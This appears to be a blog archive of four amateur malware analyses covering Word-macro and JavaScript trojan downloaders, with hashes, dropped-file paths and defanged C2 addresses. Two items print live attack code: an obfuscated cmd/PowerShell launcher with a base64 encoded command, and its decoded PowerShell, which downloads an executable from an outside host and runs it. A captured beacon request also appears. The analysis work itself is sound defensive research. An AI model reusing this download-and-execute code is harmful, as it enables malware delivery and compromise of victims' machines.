Tag Archives: TrojanDownloader

Trojan downloader word macro


SHA256 – 4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808

Download link – VirusTotal

I downloaded this word document and checked whether macro present and it auto executes on opening document.

Yes, it does and it has obfuscated strings too.

blg5-05132019.PNG

I opened document and navigated to > Views > Macros > View Macros > Selected “autoopen” > Edit

blg5-05132019-3.PNG

I renamed autoopen() to autoopen2. (Which you can see in above screenshot)

blg5-05132019-4.PNG

while debugging macro, found it executed PowerShell script in obfuscated form.

blg5-05132019-5

blg5-05132019-6.PNG

After deobfuscate, below is the PowerShell script.

blg5-05132019-7.PNG

On debugging PowerShell script, it tries to download 685.exe from one of below URL’s

blg5-05132019-9.png

blg5-05132019-8.PNG

http://duanlocphatresidence%5B.%5Dcom/wp-admin/b8oyf2_w724r5u-66253
http://superwhite%5B.%5Dcom%5B.%5Dau/wp-content/2t9x_bmoau88p-89600496
http://pneumorek%5B.%5Dma/calendar/EckAzvvl
http://pure-vapedistribution%5B.%5Dbe/p52r/js74mi_zk0p5orhwa-651
http://nitincarcare%5B.%5Dcom/wp-content/BbayinbUK

and drops PE file at location C:\Users\<user>\685.exe

blg5-05132019-10.png

While debugging PowerShell script, I tried to hit the download script but found none of above URL’s has PE file.

The file is removed from all URL’s.

Below is VirusTotal score.

blg5-05132019-11.PNG

 

Trojan- JS downloader


I have downloaded JS trojan downloader from VirusSign  to analyze behavior of this malware. It was a zip file INC_0987155124US_Apr_19_2019.zip and after extracting it, I got .js file.

On opening JS file in notepad, i saw base64 obfuscated string. After obfuscation JS script, I found, this file has multiple sources/ URL’s to download  SHA256- d6798b62cef08c4f61a30dfa346faf5aa29f9d03e4599ebe5ae910a193087b86

Below are  the URL’s used in JS to download malicious executable files.

Blg3_20042019_4

Below is JS code where it goes to the URL to check whether it’s up else will check another URL to get the malware downloaded on user’s machine.

Blg3_20042019_7

I tried to accessed all four URL’s used in JS script and could able to download malicious .exe files from three of them. One URL was inaccessible.

Blg3_20042019_2.PNG

Below are executable files downloaded from URL’s.

Blg3_20042019_3

When I checked the version and hash of all three files, all were same.

Blg3_20042019_6

Behavior of executable file:

On execution, file get created under C:\Windows\SysWow64 directory under name sourcematrix.exe. 

Blg3_20042019_8

and it also adds to the windows services (services.msc).

Blg3_20042019_9.PNG

Wireshark log shows this malware executable connects to IP address 5[.]230[.]147[.]179

Blg3_20042019_12.PNG

Below is malicious executable file hash

SHA256: D6798B62CEF08C4F61A30DFA346FAF5AA29F9D03E4599EBE5AE910A193087B86

Thank you.

Word Macro backdoor Trojan


I came across this sample from one of Twitter post and immediately I downloaded this sample from virusbay.io  for analysis.

First I used oleTools to analyse word macro.

  • Macro will execute on opening file.
  • It creates text file.
  • It executes PowerShell command.
  • it has base64 used to obfuscate the string.
  • And it creates two bat files which will execute PowerShell script.

blg2-04150-1

blg2-04150-2.PNG

Below screenshots of word document

blg2-04150-3

blg2-04150-5.PNG

When I clicked on Enable Editing and Edit Macro, A pop came up and asking for password. Which I didn’t know and I clicked on Cancel button but macro executed.

blg2-04150-13

blg2-04150-14.PNG

While performing this action, I was running Sysinternal’s Autoruns  and Process Monitor to capture the background activity.

And found word document dropped files at location C:\ProgramData file names are

  • Win32ApiSync.bat 
  • Win32ApiSyncLog.txt

blg2-04150-11

and dropped another file at location Startup programs.

  • Win32ApiSyncTskSchdlr.bat

blg2-04150-10

Win32ApiSyngTskSchDlr.bat file will execute Win32ApiSync.bat file and add it task scheduler for running 1 hourly basis.

blg2-04150-8

and Win32ApiSync.bat file will decode base64 obfuscated string stored in file Win32ApiSyncLog.txt. 

blg2-04150-9

You can read Win32ApiSyncLog.txt file data here Pastebin

I used below PowerShell script to decode  Base64 obfuscated string and written it to text file which was actually a PowerShell script.

blg2-04150-15.PNG

Decoded base64 string you can read here at Pastebin and below is the screenshot of decoded string which is PowerShell script.

blg2-04150-16.PNG

Above decoded PowerShell has another base64 obfuscated string (start of string highlighted in yellow) which i decoded again using same PowerShell script (above screenshot) and output text you can find here on Pastebin

It has Chinese like characters which I was unable to decode/translate and because of this i thought to run this PowerShell to see the behavior.

I executed Win32ApiSyncTskSchdlr.bat file and saw that this file created a task scheduler job and schedule Win32ApiSync.bat file triggering every 1 hour.

I found this information in Sysinternal’s Autoruns tool

blg2-04150-18

Below is the task scheduler job.

blg2-04150-19

I also could find the files getting dropped at below locations and file names are

  • 6772.xml
  • AutoSaved_17e74b3e-413b-498a-a922-8f04498c1d4a_Untitled2.ps1
  • AutoSaved_d40bd1dc-5457-4e11-85d5-b31138ee3b48_Untitled3.ps1
  • Userconfig.xml

blg2-04150-17

6772.xml file data

blg2-04150-24

connection has made to remote IP 94[.]23[.]148[.]194 and post request has made.

blg2-04150-23

below is the post command

POST /serverScript/clientFrontLine/helloServer.php?helloMsg=NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0V

another http request I see in wireshark is 414 Request-URI too long and host is HANGER[]mobinhost[.]com port 80

blg2-04150-22

One more file created at location C:\ProgramData\error.txt

File has logs which saying “unable to connect to remote server.” (This may be when I disconnected from Internet) and another error was logged is “Invalid URI: The Uri string is too long.”

blg2-04150-25

I renamed all dropped bat files, PowerShell scripts and text file and tried to access the IP address via browser.

blg2-04150-27

blg2-04150-28.PNG

Behavior of Malware: 

  • On opening word document, drops Batch files and which executes PowerShell script from base64 obfuscated string.
  • Batch files creates a task scheduler jobs which executes every hour.
  • From the error logs and WireShark network logs, it seems it upload data to IP 94[.]23[.]148[.]194

 

Files dropped on system:

  • C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32ApiSyncTskSchdlr.bat
  • C:\ProgramData\Win32ApiSync.bat
  • C:\ProgramData\Win32ApiSyncLog.txt
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\user.config
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\AutoSaved_17e74b3e-413b-498a-a922-8f04498c1d4a_Untitled2.ps1
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\AutoSaved_d40bd1dc-5457-4e11-85d5-b31138ee3b48_Untitled3.ps1
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6772.xml

 

Suggestions are welcome. Thank you.

Microsoft word document malware analysis


I had emailed a recruiter last year for a job opportunity. He reverted back year later with attachment and it was encrypted and provided password.

Email

Unzipped and looked for the properties of word document.

Email3

I analysed file using Oletools  and the result showed it as a suspicious file.

Email4

I found value (“1jwe7d7n1544”) in the Macro code (which is highlighted in yellow).

Email5

After debugging macro from word document, I got base64 string (below the screenshot).

Email6.PNG

cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAiACkAewANAAoAIAAgACAAIAAgAHQAcgB5AHsADQAKACAAIAAgACAAIAAkAHUAcgBpACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAIgBoAHQAdABwADoALwAvAHYAZQB1AGwAYQBsAG0AZgBmAHkAeQAuAGMAbwBtAHAAYQBuAHkALwBwAHUAZQB3AHAAeABtAGEAcwBsAC8AcwB1AG8AZQBwAHcAeABwAGEAbQB4AGEAcAB4AGwAYQBtAHMAbAB4AGQAbwAuAHAAaABwAD8AbAA9AHMAawBsAGkAbQBmADUALgBoAGEAcgB6ACIAKQANAAoAIAAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACQAbQAuAEkAbgB2AG8AawBlACgAJABpAG4AcwB0AGEAbgBjAGUALAAgACgAJAB1AHIAaQApACkAOwANAAoADQAKACAAIAAgACAAIAAkAHAAYQB0AGgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ARABhAHQAYQAiACkAIAArACAAIgBcAFwAQgByAE0AdABqAC4AZQB4AGUAIgA7AA0ACgAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAcABhAHQAaAAsACAAJAByAGUAcwBwAG8AbgBzAGUAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAYwBsAHMAaQBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABHAHUAaQBkACAAJwBDADAAOABBAEYARAA5ADAALQBGADIAQQAxAC0AMQAxAEQAMQAtADgANAA1ADUALQAwADAAQQAwAEMAOQAxAEYAMwA4ADgAMAAnAA0ACgAgACAAIAAgACAAJAB0AHkAcABlACAAPQAgAFsAVAB5AHAAZQBdADoAOgBHAGUAdABUAHkAcABlAEYAcgBvAG0AQwBMAFMASQBEACgAJABjAGwAcwBpAGQAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQAIAA9ACAAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHQAeQBwAGUAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQALgBEAG8AYwB1AG0AZQBuAHQALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQAcABhAHQAaAAsACQAbgB1AGwALAAgACQAbgB1AGwALAAgACQAbgB1AGwALAAwACkADQAKAA0ACgAgACAAIAAgACAAfQBjAGEAdABjAGgAewB9AA0ACgAgACAAIAAgACAADQAKACAAIAB9AA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA 

Converting base64 string, resulted in the below PowerShell code.

$instance = [System.Activator]::CreateInstance(“System.Net.WebClient”);
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq “DownloadData”){
try{
$uri = New-Object System.Uri(“http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz”)
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath(“CommonApplicationData”) + “\\BrMtj.exe”;
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid ‘C08AFD90-F2A1-11D1-8455-00A0C91F3880’
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;

Behavior of Macro — 

  • Executes when word document opens.

Behavior of PowerShell script —

  • PowerShell script access URL  (http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz)
  • It downloads executable file BrMtj.exe

Note: When i tried to access URL in browser, it was inaccessible.

Malware Sample on Virus Total — 

SHA256 — e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720